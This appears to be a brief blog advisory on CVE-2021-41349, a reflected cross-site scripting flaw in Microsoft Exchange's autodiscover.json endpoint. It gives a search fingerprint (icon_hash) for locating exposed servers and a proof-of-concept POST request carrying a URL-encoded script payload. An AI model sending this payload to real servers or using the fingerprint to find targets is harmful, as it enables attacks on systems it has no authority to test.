Microsoft Exchange Autodiscover Json Reflective Xss Cve 2021 41349
Microsoft Exchange Autodiscover Json Reflective Xss Cve 2021 41349
Microsoft Exchange autodiscover.json Reflective XSS CVE-2021-41349
Vulnerability Description
Reflective XSS exists in the Microsoft Exchange autodiscover.json file, which is caused by insufficient filtering.
Vulnerability Impact
Microsoft Exchange
Network surveying and mapping
icon_hash=”1768726119”
Vulnerability reappears
Login page
Verify POC
1
2
3
POST /autodiscover/autodiscover.json
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
This post is licensed under CC BY 4.0 by the author.